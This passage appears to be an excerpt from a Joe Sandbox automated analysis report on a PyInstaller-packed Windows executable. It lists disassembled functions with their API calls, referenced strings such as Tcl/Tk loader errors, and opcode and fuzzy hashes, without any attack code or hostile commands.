Instruction Fuzzy Hash: 85015B30F0D6C240FA907B6565419F9E290BF407A4FB45637EA2D436E6DE6CA442C730

Function 00007FF78F497DEC Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F497E05

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction ID: 651ced10ad2dadb8782a4b50fa4e6780b40fd0fe2b12c6582135be627fb0e55a
Opcode Fuzzy Hash: f6d2080b1b78402d7abe66b145058d3ba054e314cadcac67310d584db64078aa
Instruction Fuzzy Hash: 82E0B674F0828642FE55BAA04A82AF991506F54341FB44432DA0D4B2E3DE1C6C96D671

Function 00007FF78F4883E0 Relevance: 1.3, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 5fa28e36025bd9fe9b761eb46eefd3724bf101683452c01a56c5c02a220ce566
Instruction ID: a06e036d0704350d8b7874984e97c9ca9058a598835004d465e79264c7c29f4d
Opcode Fuzzy Hash: 5fa28e36025bd9fe9b761eb46eefd3724bf101683452c01a56c5c02a220ce566
Instruction Fuzzy Hash: 0A416726E2C6C641F611AB24D5112FDA360FBA5744FB49233DB8D43153EF28E6D8C310

Function 00007FF78F49F158 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF78F49B9A6,?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02), ref: 00007FF78F49F1AD

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
Instruction ID: b509c355ebb9b2a29f1bbd1ebbfc6ccc98d1fdcac5038b77901ac04d44030321
Opcode Fuzzy Hash: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
Instruction Fuzzy Hash: 1BF04F75B0968685FE547662D912AF5E291BF88B60FEC4432CD0E473E1EF1CA880C2B0

Function 00007FF78F49DBBC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF78F490D24,?,?,?,00007FF78F492236,?,?,?,?,?,00007FF78F493829), ref: 00007FF78F49DBFA

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
Instruction ID: 33ec4e4790ad94f4d1f481e9b928cd4adc0a31589453a0e753b57db2f570d4bb
Opcode Fuzzy Hash: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
Instruction Fuzzy Hash: CFF0FE75B0D2C645FE5476629901AF5D1A07F88760FA84732D96E872E2DD6DA481C230

Non-executed Functions

Function 00007FF78F486EF0 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF78F486F07
GetProcAddress.KERNEL32 ref: 00007FF78F486F46
GetProcAddress.KERNEL32 ref: 00007FF78F486F6B
GetProcAddress.KERNEL32 ref: 00007FF78F486F90
GetProcAddress.KERNEL32 ref: 00007FF78F486FB8
GetProcAddress.KERNEL32 ref: 00007FF78F486FE0
GetProcAddress.KERNEL32 ref: 00007FF78F487008
GetProcAddress.KERNEL32 ref: 00007FF78F487030
GetProcAddress.KERNEL32 ref: 00007FF78F487058

Strings

Tcl_EvalObjv, xrefs: 00007FF78F48731E
Tcl_DoOneEvent, xrefs: 00007FF78F486F86
Tcl_GetObjResult, xrefs: 00007FF78F4872A6
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF78F4870BA
Tcl_NewStringObj, xrefs: 00007FF78F48722E
Tcl_SetVar2Ex, xrefs: 00007FF78F48727E
Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF78F48715A
Failed to get address for Tcl_Finalize, xrefs: 00007FF78F486FCA
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF78F48724A
Tcl_EvalFile, xrefs: 00007FF78F4872CE
Failed to get address for Tcl_Alloc, xrefs: 00007FF78F487362
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF78F48706A
Failed to get address for Tcl_EvalFile, xrefs: 00007FF78F4872EA
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF78F486F58
Failed to get address for Tk_Init, xrefs: 00007FF78F4873B2
Tcl_Alloc, xrefs: 00007FF78F487346
Tcl_ConditionNotify, xrefs: 00007FF78F4870EE
Tcl_EvalEx, xrefs: 00007FF78F4872F6
Tcl_Free, xrefs: 00007FF78F48736E
Failed to get address for Tcl_GetVar2, xrefs: 00007FF78F4871AA
Failed to get address for Tcl_ConditionWait, xrefs: 00007FF78F487132
Failed to get address for Tcl_SetVar2, xrefs: 00007FF78F4871D2
Tcl_Finalize, xrefs: 00007FF78F486FAE
Tcl_DeleteInterp, xrefs: 00007FF78F486FFE
Tcl_GetCurrentThread, xrefs: 00007FF78F48704E
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF78F487182
Tk_Init, xrefs: 00007FF78F487396
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF78F48710A
Failed to get address for Tcl_EvalEx, xrefs: 00007FF78F487312
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF78F4870E2
Tcl_ThreadAlert, xrefs: 00007FF78F487166
Tcl_CreateThread, xrefs: 00007FF78F487026
Failed to get address for Tcl_Free, xrefs: 00007FF78F48738A
Tcl_CreateInterp, xrefs: 00007FF78F486F3C
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF78F486FA2
Tk_GetNumMainWindows, xrefs: 00007FF78F4873BE
Tcl_ThreadQueueEvent, xrefs: 00007FF78F48713E
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF78F48733A
Tcl_CreateObjCommand, xrefs: 00007FF78F4871DE
Tcl_ConditionFinalize, xrefs: 00007FF78F4870C6
Failed to get address for Tcl_GetString, xrefs: 00007FF78F487222
Tcl_ConditionWait, xrefs: 00007FF78F487116
Tcl_MutexUnlock, xrefs: 00007FF78F48709E
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF78F48701A
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF78F486F7D
GetProcAddress, xrefs: 00007FF78F486F20
Tcl_NewByteArrayObj, xrefs: 00007FF78F487256
Failed to get address for Tcl_Init, xrefs: 00007FF78F486F19
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF78F487272
Tcl_GetString, xrefs: 00007FF78F487206
Tcl_FinalizeThread, xrefs: 00007FF78F486FD6
Failed to get address for Tcl_CreateThread, xrefs: 00007FF78F487042
Tcl_MutexLock, xrefs: 00007FF78F487076
Tcl_Init, xrefs: 00007FF78F486F00
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF78F4871FA
Tcl_SetVar2, xrefs: 00007FF78F4871B6
Tcl_FindExecutable, xrefs: 00007FF78F486F61
Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF78F48729A
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF78F4872C2
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF78F4873DA
Failed to get address for Tcl_MutexLock, xrefs: 00007FF78F487092
Tcl_GetVar2, xrefs: 00007FF78F48718E
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF78F486FF2

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-2208601799
Opcode ID: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
Instruction ID: 75e4f7251f7fa3eb130b49b09e76f5f19ea289eaba66fe199a78b58bdf75e471
Opcode Fuzzy Hash: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
Instruction Fuzzy Hash: A9E19F74A1EB8390FA99AB46A8501F4E6B5BF45740FF45037C81E077A8FFADE558C220

Function 00007FF78F481F50 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON

Download Yara Rule

APIs

GetDialogBaseUnits.USER32 ref: 00007FF78F481F9E
MulDiv.KERNEL32 ref: 00007FF78F481FB2
MulDiv.KERNEL32 ref: 00007FF78F481FD3
SystemParametersInfoW.USER32 ref: 00007FF78F48201B
CreateFontIndirectW.GDI32 ref: 00007FF78F48202F
#380.COMCTL32 ref: 00007FF78F482053
CreateWindowExW.USER32 ref: 00007FF78F4820A6
CreateWindowExW.USER32 ref: 00007FF78F482100
CreateWindowExW.USER32 ref: 00007FF78F48215D
CreateWindowExW.USER32 ref: 00007FF78F4821BF
SendMessageW.USER32 ref: 00007FF78F4821DF
SendMessageW.USER32 ref: 00007FF78F4821F9
SendMessageW.USER32 ref: 00007FF78F482218
SendMessageW.USER32 ref: 00007FF78F482237
SendMessageW.USER32 ref: 00007FF78F482255
SendMessageW.USER32 ref: 00007FF78F482273
SendMessageW.USER32 ref: 00007FF78F482291
SendMessageW.USER32 ref: 00007FF78F4822A9
SendMessageW.USER32 ref: 00007FF78F4822C1
GetClientRect.USER32 ref: 00007FF78F4822D0

Part of subcall function 00007FF78F4823F0: GetDC.USER32 ref: 00007FF78F48241B
Part of subcall function 00007FF78F4823F0: SelectObject.GDI32 ref: 00007FF78F482462
Part of subcall function 00007FF78F4823F0: DrawTextW.USER32 ref: 00007FF78F482485
Part of subcall function 00007FF78F4823F0: SelectObject.GDI32 ref: 00007FF78F48249B
Part of subcall function 00007FF78F4823F0: ReleaseDC.USER32 ref: 00007FF78F4824AB
Part of subcall function 00007FF78F4823F0: MoveWindow.USER32 ref: 00007FF78F4824FB
Part of subcall function 00007FF78F4823F0: MoveWindow.USER32 ref: 00007FF78F48253B
Part of subcall function 00007FF78F4823F0: MoveWindow.USER32 ref: 00007FF78F48258E

Strings

Close, xrefs: 00007FF78F482168
Failed to execute script '%ls' due to unhandled exception: %ls, xrefs: 00007FF78F481F7D
EDIT, xrefs: 00007FF78F48210B
BUTTON, xrefs: 00007FF78F482176
STATIC, xrefs: 00007FF78F48205C, 00007FF78F4820B1

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
API String ID: 2446303242-1601438679
Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction ID: cece9afdace717f9ce07678ec81205113de5bcb57db01d5dffe99995e7a0a1f6
Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
Instruction Fuzzy Hash: 4CA17A36619BC587E7149F62E45479AB770F788B84FA0412AEB9D03B24CF3DE168CB50

Function 00007FF78F4A471C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF78F4A476A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A4DD6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A4F4C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A520A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A542A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A5667
memcpy_s.LIBCPMT ref: 00007FF78F4A5742
memcpy_s.LIBCPMT ref: 00007FF78F4A57ED
memcpy_s.LIBCPMT ref: 00007FF78F4A58BC

Strings

1#IND, xrefs: 00007FF78F4A4857
1#SNAN, xrefs: 00007FF78F4A487A
1#QNAN, xrefs: 00007FF78F4A4883
1#INF, xrefs: 00007FF78F4A4893

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
Instruction ID: 18270f34bb625415664d3a96e796289e891e033b7e54a8f9be3388380bcf2bdb
Opcode Fuzzy Hash: 462ebf29a53f9f8e0898a565754c8078d18c0a01f6b8af8c35fed8b76f3e05ac
Instruction Fuzzy Hash: 0EB20572F192C28BE764DF66D5407FDB7A2FB54388FA01136DA0D57A98DB38A900CB50

Function 00007FF78F488560 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00007FF78F482A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F488587
FormatMessageW.KERNEL32 ref: 00007FF78F4885B6
WideCharToMultiByte.KERNEL32 ref: 00007FF78F48860C

Part of subcall function 00007FF78F4829E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF78F4887F2,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F482A14
Part of subcall function 00007FF78F4829E0: MessageBoxW.USER32 ref: 00007FF78F482AF0

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF78F488616
WideCharToMultiByte, xrefs: 00007FF78F48861D
PyInstaller: FormatMessageW failed., xrefs: 00007FF78F4885D3
PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00007FF78F488629
FormatMessageW, xrefs: 00007FF78F4885C7
No error messages generated., xrefs: 00007FF78F4885C0

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ErrorLastMessage$ByteCharFormatMultiWide
String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
API String ID: 2920928814-2573406579
Opcode ID: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
Instruction ID: 3206c4b399cf43b9364e9fda06563792582c539744429a49517dad6683dc3eca
Opcode Fuzzy Hash: 6472fed7a38855fe53d018715946baf175a16c93e2266fbaa2446d02f1e91665
Instruction Fuzzy Hash: CB218071A1DAC281F760AF16E8542EAA3A0FF88384FE40037E54D836A5EF3CD146C720

Function 00007FF78F48C57C Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF78F48C598
RtlCaptureContext.KERNEL32 ref: 00007FF78F48C5C5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF78F48C5DF
RtlVirtualUnwind.KERNEL32 ref: 00007FF78F48C620
IsDebuggerPresent.KERNEL32 ref: 00007FF78F48C674
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF78F48C695
UnhandledExceptionFilter.KERNEL32 ref: 00007FF78F48C6A0

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
Instruction ID: 9a4043ac08dfc8e7577b1046fad2d8d9dcc83c9f453c3ec5efbd3fdae03e3ae9
Opcode Fuzzy Hash: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
Instruction Fuzzy Hash: A5315E72619AC186EB60AF61E8407EDB364FB84748F94403ADB4D47B98DF38D648C724

Function 00007FF78F49ABD8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF78F49AC51
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF78F49AC69
RtlVirtualUnwind.KERNEL32 ref: 00007FF78F49ACA4
IsDebuggerPresent.KERNEL32 ref: 00007FF78F49ACDD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF78F49ACE7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF78F49ACF2

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
Instruction ID: a91d02dd46eb20fbccd997d782117d7368f14e6c0db2a1f62d074149ca53c40d
Opcode Fuzzy Hash: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
Instruction Fuzzy Hash: 72316332618BC186DB60DF25E8406EDB3A0FB85798FA00136EA8D47B65DF3CD545CB10

Function 00007FF78F4A1EE4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4A1F30
FindFirstFileExW.KERNEL32 ref: 00007FF78F4A203A

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
Instruction ID: b0da548dbd471f2b842d12e74d6688949e71655204efc1bf723927650ca6fcef
Opcode Fuzzy Hash: e601e72e586d0b4de4a5ebf73eb2eb015632a136167348e3e84c4a74a70f75b2
Instruction Fuzzy Hash: 7FB1D632B1A6D241EA61AB2298009F9E351FB44BD4FA44133EE5E47BD9DF3CE541D720

Function 00007FF78F48C460 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF78F48C48C
GetCurrentThreadId.KERNEL32 ref: 00007FF78F48C49A
GetCurrentProcessId.KERNEL32 ref: 00007FF78F48C4A6
QueryPerformanceCounter.KERNEL32 ref: 00007FF78F48C4B6

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
Instruction ID: d90b0d1173e3e70c5b095bea72e96ba9da77144825e4500cfc07e9c9ea7a0ef5
